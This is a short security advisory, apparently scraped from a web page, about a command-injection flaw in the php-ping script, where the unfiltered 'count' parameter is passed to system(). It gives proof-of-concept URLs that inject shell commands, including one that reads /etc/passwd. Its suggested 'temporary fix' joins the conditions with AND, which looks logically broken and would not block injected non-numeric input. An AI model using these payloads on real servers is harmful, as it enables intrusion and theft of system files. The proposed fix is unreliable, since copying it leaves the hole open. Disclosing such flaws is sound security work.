PHP-ping: Executing arbritary commands
trang này đã được đọc lầnppp-design found the following design error in
php-ping:
Details
-------
Product: php-ping
Affected Version: (no version information included in the script)
Immune Version: latest version
OS affected: all OS with php
Vendor-URL: http://www.theworldsend.net/
Vendor-Status: informed, new version avaiable
Security-Risk: high - very high
Remote-Exploit: Yes
More details
------------
The problem is based upon the fact that not all user inputs are filtered
correctly. Although $host ist filtered using preg_replace the $count
variable is parsed unfiltered to the system() command.
Proof-of-concept
----------------
You can use one of the following proof of concepts:
+http://www.example.com/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
+http://www.example.com/php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21
Temporary-Fix
-------------
Replace
CODE
If ($count > $max_count)
with
CODE
If ($count > $max_count && !is_numeric($count))